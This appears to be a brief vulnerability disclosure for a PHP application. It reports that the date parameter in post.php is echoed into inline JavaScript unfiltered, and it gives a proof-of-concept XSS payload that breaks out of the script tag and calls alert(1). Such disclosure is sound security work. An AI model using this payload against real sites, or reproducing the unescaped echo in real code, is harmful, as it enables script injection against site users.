1、Download source code audit,It was found that the date parameter in the post.php file was not filtered during output.
# line 245
function goto_page(e)
{
var evt = e || window.event;
var eventSrc = evt.target||evt.srcElement;
if ((e.keyCode || e.which) == 13) {
location.href = '?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&tag=<?php echo urlencode($filter_tag); ?>&page=' + eventSrc.value;
}
}
2、payload and recurrence vulnerability
1111'</script><script>alert(1);</script>
